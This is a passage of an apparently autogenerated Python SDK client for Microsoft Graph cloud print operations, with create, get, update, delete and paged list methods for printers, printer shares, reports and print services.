    if select is not None:
        query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
    if expand is not None:
        query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')

    header_parameters = {'Accept': self._serialize.header("accept", accept, 'str')}  # type: Dict[str, Any]

    request = self._client.get(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    deserialized = self._deserialize('MicrosoftGraphPrinter', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
get_printers.metadata = {'url': '/print/printers/{printer-id}'}  # type: ignore
def update_printers(
    self,
    printer_id,  # type: str
    body,  # type: "models.MicrosoftGraphPrinter"
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Update the navigation property printers in print.

    Issues a PATCH carrying the new property values for the addressed
    printer; a successful update returns no content (204).

    :param printer_id: key: id of printer.
    :type printer_id: str
    :param body: New navigation property values.
    :type body: ~devices_cloud_print.models.MicrosoftGraphPrinter
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # Resolve the URL template with the entity key.
    url = self._client.format_url(
        self.update_printers.metadata['url'],  # type: ignore
        **{'printer-id': self._serialize.url("printer_id", printer_id, 'str')}
    )

    query_parameters = {}  # type: Dict[str, Any]
    header_parameters = {
        'Content-Type': self._serialize.header("content_type", content_type, 'str'),
        'Accept': self._serialize.header("accept", accept, 'str'),
    }  # type: Dict[str, Any]

    # Serialize the payload and send the PATCH through the pipeline.
    body_content_kwargs = {'content': self._serialize.body(body, 'MicrosoftGraphPrinter')}  # type: Dict[str, Any]
    request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})
update_printers.metadata = {'url': '/print/printers/{printer-id}'}  # type: ignore
def delete_printers(
    self,
    printer_id,  # type: str
    if_match=None,  # type: Optional[str]
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Delete navigation property printers for print.

    Sends a DELETE for the addressed printer, optionally conditioned on an
    ETag via ``If-Match``; success yields no content (204).

    :param printer_id: key: id of printer.
    :type printer_id: str
    :param if_match: ETag.
    :type if_match: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    # Resolve the URL template with the entity key.
    url = self._client.format_url(
        self.delete_printers.metadata['url'],  # type: ignore
        **{'printer-id': self._serialize.url("printer_id", printer_id, 'str')}
    )

    query_parameters = {}  # type: Dict[str, Any]
    header_parameters = {'Accept': self._serialize.header("accept", accept, 'str')}  # type: Dict[str, Any]
    # The conditional header is attached only when the caller supplied an ETag.
    if if_match is not None:
        header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')

    request = self._client.delete(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})
delete_printers.metadata = {'url': '/print/printers/{printer-id}'}  # type: ignore
def list_printer_shares(
    self,
    orderby=None,  # type: Optional[List[Union[str, "models.Enum59"]]]
    select=None,  # type: Optional[List[Union[str, "models.Enum60"]]]
    expand=None,  # type: Optional[List[Union[str, "models.Enum61"]]]
    **kwargs  # type: Any
):
    # type: (...) -> Iterable["models.CollectionOfPrinterShare0"]
    """Get printerShares from print.

    Returns a lazily-evaluated pager over the printerShares collection; each
    page is fetched on demand by following the OData next link.

    :param orderby: Order items by property values.
    :type orderby: list[str or ~devices_cloud_print.models.Enum59]
    :param select: Select properties to be returned.
    :type select: list[str or ~devices_cloud_print.models.Enum60]
    :param expand: Expand related entities.
    :type expand: list[str or ~devices_cloud_print.models.Enum61]
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: An iterator like instance of either CollectionOfPrinterShare0 or the result of cls(response)
    :rtype: ~azure.core.paging.ItemPaged[~devices_cloud_print.models.CollectionOfPrinterShare0]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.CollectionOfPrinterShare0"]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    def prepare_request(next_link=None):
        # Build the GET for one page: the first page uses the collection URL
        # plus the OData query options; later pages use the server-supplied
        # next link verbatim (it already encodes the query state).
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        if not next_link:
            # Construct URL
            url = self.list_printer_shares.metadata['url']  # type: ignore
            # Construct parameters
            query_parameters = {}  # type: Dict[str, Any]
            # Client-level paging/filtering options come from the shared config…
            if self._config.top is not None:
                query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
            if self._config.skip is not None:
                query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
            if self._config.search is not None:
                query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
            if self._config.filter is not None:
                query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
            if self._config.count is not None:
                query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
            # …while per-call options are captured from the enclosing scope.
            if orderby is not None:
                query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
            if select is not None:
                query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
            if expand is not None:
                query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
            request = self._client.get(url, query_parameters, header_parameters)
        else:
            url = next_link
            query_parameters = {}  # type: Dict[str, Any]
            request = self._client.get(url, query_parameters, header_parameters)
        return request

    def extract_data(pipeline_response):
        # Deserialize one page and hand ItemPaged the (next_link, items) pair.
        deserialized = self._deserialize('CollectionOfPrinterShare0', pipeline_response)
        list_of_elem = deserialized.value
        if cls:
            list_of_elem = cls(list_of_elem)
        return deserialized.odata_next_link or None, iter(list_of_elem)

    def get_next(next_link=None):
        # Fetch one page through the pipeline, raising on non-200 responses.
        request = prepare_request(next_link)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            error = self._deserialize(models.OdataError, response)
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        return pipeline_response

    return ItemPaged(
        get_next, extract_data
    )
list_printer_shares.metadata = {'url': '/print/printerShares'}  # type: ignore
def create_printer_shares(
    self,
    body,  # type: "models.MicrosoftGraphPrinterShare"
    **kwargs  # type: Any
):
    # type: (...) -> "models.MicrosoftGraphPrinterShare"
    """Create new navigation property to printerShares for print.

    POSTs the supplied printerShare entity to the collection and returns the
    server's view of the created entity.

    :param body: New navigation property.
    :type body: ~devices_cloud_print.models.MicrosoftGraphPrinterShare
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: MicrosoftGraphPrinterShare, or the result of cls(response)
    :rtype: ~devices_cloud_print.models.MicrosoftGraphPrinterShare
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphPrinterShare"]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # Collection URL has no path parameters to substitute.
    url = self.create_printer_shares.metadata['url']  # type: ignore
    query_parameters = {}  # type: Dict[str, Any]
    header_parameters = {
        'Content-Type': self._serialize.header("content_type", content_type, 'str'),
        'Accept': self._serialize.header("accept", accept, 'str'),
    }  # type: Dict[str, Any]

    # Serialize the payload and issue the POST through the pipeline.
    body_content_kwargs = {'content': self._serialize.body(body, 'MicrosoftGraphPrinterShare')}  # type: Dict[str, Any]
    request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [201]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    deserialized = self._deserialize('MicrosoftGraphPrinterShare', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
create_printer_shares.metadata = {'url': '/print/printerShares'}  # type: ignore
def get_printer_shares(
    self,
    printer_share_id,  # type: str
    select=None,  # type: Optional[List[Union[str, "models.Enum62"]]]
    expand=None,  # type: Optional[List[Union[str, "models.Enum63"]]]
    **kwargs  # type: Any
):
    # type: (...) -> "models.MicrosoftGraphPrinterShare"
    """Get printerShares from print.

    Fetches a single printerShare by its key, optionally narrowing the
    returned properties with ``$select`` and expanding related entities with
    ``$expand``.

    :param printer_share_id: key: id of printerShare.
    :type printer_share_id: str
    :param select: Select properties to be returned.
    :type select: list[str or ~devices_cloud_print.models.Enum62]
    :param expand: Expand related entities.
    :type expand: list[str or ~devices_cloud_print.models.Enum63]
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: MicrosoftGraphPrinterShare, or the result of cls(response)
    :rtype: ~devices_cloud_print.models.MicrosoftGraphPrinterShare
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphPrinterShare"]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    # Resolve the URL template with the entity key.
    url = self._client.format_url(
        self.get_printer_shares.metadata['url'],  # type: ignore
        **{'printerShare-id': self._serialize.url("printer_share_id", printer_share_id, 'str')}
    )

    # OData query options are sent only when explicitly requested.
    query_parameters = {}  # type: Dict[str, Any]
    if select is not None:
        query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
    if expand is not None:
        query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')

    header_parameters = {'Accept': self._serialize.header("accept", accept, 'str')}  # type: Dict[str, Any]

    request = self._client.get(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    deserialized = self._deserialize('MicrosoftGraphPrinterShare', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
get_printer_shares.metadata = {'url': '/print/printerShares/{printerShare-id}'}  # type: ignore
def update_printer_shares(
    self,
    printer_share_id,  # type: str
    body,  # type: "models.MicrosoftGraphPrinterShare"
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Update the navigation property printerShares in print.

    Issues a PATCH carrying the new property values for the addressed
    printerShare; a successful update returns no content (204).

    :param printer_share_id: key: id of printerShare.
    :type printer_share_id: str
    :param body: New navigation property values.
    :type body: ~devices_cloud_print.models.MicrosoftGraphPrinterShare
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # Resolve the URL template with the entity key.
    url = self._client.format_url(
        self.update_printer_shares.metadata['url'],  # type: ignore
        **{'printerShare-id': self._serialize.url("printer_share_id", printer_share_id, 'str')}
    )

    query_parameters = {}  # type: Dict[str, Any]
    header_parameters = {
        'Content-Type': self._serialize.header("content_type", content_type, 'str'),
        'Accept': self._serialize.header("accept", accept, 'str'),
    }  # type: Dict[str, Any]

    # Serialize the payload and send the PATCH through the pipeline.
    body_content_kwargs = {'content': self._serialize.body(body, 'MicrosoftGraphPrinterShare')}  # type: Dict[str, Any]
    request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})
update_printer_shares.metadata = {'url': '/print/printerShares/{printerShare-id}'}  # type: ignore
def delete_printer_shares(
    self,
    printer_share_id,  # type: str
    if_match=None,  # type: Optional[str]
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Delete navigation property printerShares for print.

    Sends a DELETE for the addressed printerShare, optionally conditioned on
    an ETag via ``If-Match``; success yields no content (204).

    :param printer_share_id: key: id of printerShare.
    :type printer_share_id: str
    :param if_match: ETag.
    :type if_match: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    # Resolve the URL template with the entity key.
    url = self._client.format_url(
        self.delete_printer_shares.metadata['url'],  # type: ignore
        **{'printerShare-id': self._serialize.url("printer_share_id", printer_share_id, 'str')}
    )

    query_parameters = {}  # type: Dict[str, Any]
    header_parameters = {'Accept': self._serialize.header("accept", accept, 'str')}  # type: Dict[str, Any]
    # The conditional header is attached only when the caller supplied an ETag.
    if if_match is not None:
        header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')

    request = self._client.delete(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})
delete_printer_shares.metadata = {'url': '/print/printerShares/{printerShare-id}'}  # type: ignore
def list_reports(
    self,
    orderby=None,  # type: Optional[List[Union[str, "models.Enum72"]]]
    select=None,  # type: Optional[List[Union[str, "models.Enum73"]]]
    expand=None,  # type: Optional[List[Union[str, "models.Enum74"]]]
    **kwargs  # type: Any
):
    # type: (...) -> Iterable["models.CollectionOfReportRoot"]
    """Get reports from print.

    Returns a lazily-evaluated pager over the reports collection; each page
    is fetched on demand by following the OData next link.

    :param orderby: Order items by property values.
    :type orderby: list[str or ~devices_cloud_print.models.Enum72]
    :param select: Select properties to be returned.
    :type select: list[str or ~devices_cloud_print.models.Enum73]
    :param expand: Expand related entities.
    :type expand: list[str or ~devices_cloud_print.models.Enum74]
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: An iterator like instance of either CollectionOfReportRoot or the result of cls(response)
    :rtype: ~azure.core.paging.ItemPaged[~devices_cloud_print.models.CollectionOfReportRoot]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.CollectionOfReportRoot"]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    def prepare_request(next_link=None):
        # Build the GET for one page: the first page uses the collection URL
        # plus the OData query options; later pages use the server-supplied
        # next link verbatim (it already encodes the query state).
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        if not next_link:
            # Construct URL
            url = self.list_reports.metadata['url']  # type: ignore
            # Construct parameters
            query_parameters = {}  # type: Dict[str, Any]
            # Client-level paging/filtering options come from the shared config…
            if self._config.top is not None:
                query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
            if self._config.skip is not None:
                query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
            if self._config.search is not None:
                query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
            if self._config.filter is not None:
                query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
            if self._config.count is not None:
                query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
            # …while per-call options are captured from the enclosing scope.
            if orderby is not None:
                query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
            if select is not None:
                query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
            if expand is not None:
                query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
            request = self._client.get(url, query_parameters, header_parameters)
        else:
            url = next_link
            query_parameters = {}  # type: Dict[str, Any]
            request = self._client.get(url, query_parameters, header_parameters)
        return request

    def extract_data(pipeline_response):
        # Deserialize one page and hand ItemPaged the (next_link, items) pair.
        deserialized = self._deserialize('CollectionOfReportRoot', pipeline_response)
        list_of_elem = deserialized.value
        if cls:
            list_of_elem = cls(list_of_elem)
        return deserialized.odata_next_link or None, iter(list_of_elem)

    def get_next(next_link=None):
        # Fetch one page through the pipeline, raising on non-200 responses.
        request = prepare_request(next_link)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            error = self._deserialize(models.OdataError, response)
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        return pipeline_response

    return ItemPaged(
        get_next, extract_data
    )
list_reports.metadata = {'url': '/print/reports'}  # type: ignore
def create_reports(
    self,
    body,  # type: "models.MicrosoftGraphReportRoot"
    **kwargs  # type: Any
):
    # type: (...) -> "models.MicrosoftGraphReportRoot"
    """Create new navigation property to reports for print.

    POSTs the supplied reportRoot entity to the collection and returns the
    server's view of the created entity.

    :param body: New navigation property.
    :type body: ~devices_cloud_print.models.MicrosoftGraphReportRoot
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: MicrosoftGraphReportRoot, or the result of cls(response)
    :rtype: ~devices_cloud_print.models.MicrosoftGraphReportRoot
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphReportRoot"]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # Collection URL has no path parameters to substitute.
    url = self.create_reports.metadata['url']  # type: ignore
    query_parameters = {}  # type: Dict[str, Any]
    header_parameters = {
        'Content-Type': self._serialize.header("content_type", content_type, 'str'),
        'Accept': self._serialize.header("accept", accept, 'str'),
    }  # type: Dict[str, Any]

    # Serialize the payload and issue the POST through the pipeline.
    body_content_kwargs = {'content': self._serialize.body(body, 'MicrosoftGraphReportRoot')}  # type: Dict[str, Any]
    request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [201]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    deserialized = self._deserialize('MicrosoftGraphReportRoot', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
create_reports.metadata = {'url': '/print/reports'}  # type: ignore
def get_reports(
    self,
    report_root_id,  # type: str
    select=None,  # type: Optional[List[Union[str, "models.Enum75"]]]
    expand=None,  # type: Optional[List[Union[str, "models.Enum76"]]]
    **kwargs  # type: Any
):
    # type: (...) -> "models.MicrosoftGraphReportRoot"
    """Get reports from print.

    Fetches a single reportRoot by its key, optionally narrowing the
    returned properties with ``$select`` and expanding related entities with
    ``$expand``.

    :param report_root_id: key: id of reportRoot.
    :type report_root_id: str
    :param select: Select properties to be returned.
    :type select: list[str or ~devices_cloud_print.models.Enum75]
    :param expand: Expand related entities.
    :type expand: list[str or ~devices_cloud_print.models.Enum76]
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: MicrosoftGraphReportRoot, or the result of cls(response)
    :rtype: ~devices_cloud_print.models.MicrosoftGraphReportRoot
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphReportRoot"]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    # Resolve the URL template with the entity key.
    url = self._client.format_url(
        self.get_reports.metadata['url'],  # type: ignore
        **{'reportRoot-id': self._serialize.url("report_root_id", report_root_id, 'str')}
    )

    # OData query options are sent only when explicitly requested.
    query_parameters = {}  # type: Dict[str, Any]
    if select is not None:
        query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
    if expand is not None:
        query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')

    header_parameters = {'Accept': self._serialize.header("accept", accept, 'str')}  # type: Dict[str, Any]

    request = self._client.get(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    deserialized = self._deserialize('MicrosoftGraphReportRoot', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
get_reports.metadata = {'url': '/print/reports/{reportRoot-id}'}  # type: ignore
def update_reports(
    self,
    report_root_id,  # type: str
    body,  # type: "models.MicrosoftGraphReportRoot"
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Update the navigation property reports in print.

    Issues a PATCH carrying the new property values for the addressed
    reportRoot; a successful update returns no content (204).

    :param report_root_id: key: id of reportRoot.
    :type report_root_id: str
    :param body: New navigation property values.
    :type body: ~devices_cloud_print.models.MicrosoftGraphReportRoot
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # Resolve the URL template with the entity key.
    url = self._client.format_url(
        self.update_reports.metadata['url'],  # type: ignore
        **{'reportRoot-id': self._serialize.url("report_root_id", report_root_id, 'str')}
    )

    query_parameters = {}  # type: Dict[str, Any]
    header_parameters = {
        'Content-Type': self._serialize.header("content_type", content_type, 'str'),
        'Accept': self._serialize.header("accept", accept, 'str'),
    }  # type: Dict[str, Any]

    # Serialize the payload and send the PATCH through the pipeline.
    body_content_kwargs = {'content': self._serialize.body(body, 'MicrosoftGraphReportRoot')}  # type: Dict[str, Any]
    request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})
update_reports.metadata = {'url': '/print/reports/{reportRoot-id}'}  # type: ignore
def delete_reports(
    self,
    report_root_id,  # type: str
    if_match=None,  # type: Optional[str]
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Delete navigation property reports for print.

    :param report_root_id: key: id of reportRoot.
    :type report_root_id: str
    :param if_match: ETag.
    :type if_match: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    # Expand the URL template with the entity key.
    path_format_arguments = {
        'reportRoot-id': self._serialize.url("report_root_id", report_root_id, 'str'),
    }
    url = self._client.format_url(self.delete_reports.metadata['url'], **path_format_arguments)  # type: ignore

    # This operation takes no query parameters.
    query_parameters = {}  # type: Dict[str, Any]

    # If-Match is only sent when the caller supplied an ETag.
    header_parameters = {}  # type: Dict[str, Any]
    if if_match is not None:
        header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.delete(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})
delete_reports.metadata = {'url': '/print/reports/{reportRoot-id}'}  # type: ignore
def list_services(
    self,
    orderby=None,  # type: Optional[List[Union[str, "models.Enum77"]]]
    select=None,  # type: Optional[List[Union[str, "models.Enum78"]]]
    expand=None,  # type: Optional[List[Union[str, "models.Enum79"]]]
    **kwargs  # type: Any
):
    # type: (...) -> Iterable["models.CollectionOfPrintService"]
    """Get services from print.

    :param orderby: Order items by property values.
    :type orderby: list[str or ~devices_cloud_print.models.Enum77]
    :param select: Select properties to be returned.
    :type select: list[str or ~devices_cloud_print.models.Enum78]
    :param expand: Expand related entities.
    :type expand: list[str or ~devices_cloud_print.models.Enum79]
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: An iterator like instance of either CollectionOfPrintService or the result of cls(response)
    :rtype: ~azure.core.paging.ItemPaged[~devices_cloud_print.models.CollectionOfPrintService]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.CollectionOfPrintService"]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    def prepare_request(next_link=None):
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        if next_link:
            # Follow-up pages: the service-provided link already encodes the query.
            return self._client.get(next_link, {}, header_parameters)

        # First page: client-level paging options plus the caller's OData options.
        url = self.list_services.metadata['url']  # type: ignore
        query_parameters = {}  # type: Dict[str, Any]
        if self._config.top is not None:
            query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
        if self._config.skip is not None:
            query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
        if self._config.search is not None:
            query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
        if self._config.filter is not None:
            query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
        if self._config.count is not None:
            query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
        if orderby is not None:
            query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
        if select is not None:
            query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
        if expand is not None:
            query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
        return self._client.get(url, query_parameters, header_parameters)

    def extract_data(pipeline_response):
        deserialized = self._deserialize('CollectionOfPrintService', pipeline_response)
        elements = deserialized.value
        if cls:
            elements = cls(elements)
        return deserialized.odata_next_link or None, iter(elements)

    def get_next(next_link=None):
        pipeline_response = self._client._pipeline.run(prepare_request(next_link), stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            error = self._deserialize(models.OdataError, response)
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        return pipeline_response

    return ItemPaged(get_next, extract_data)
list_services.metadata = {'url': '/print/services'}  # type: ignore
def create_services(
    self,
    body,  # type: "models.MicrosoftGraphPrintService"
    **kwargs  # type: Any
):
    # type: (...) -> "models.MicrosoftGraphPrintService"
    """Create new navigation property to services for print.

    :param body: New navigation property.
    :type body: ~devices_cloud_print.models.MicrosoftGraphPrintService
    :keyword callable cls: A custom type or function that will be passed the direct response
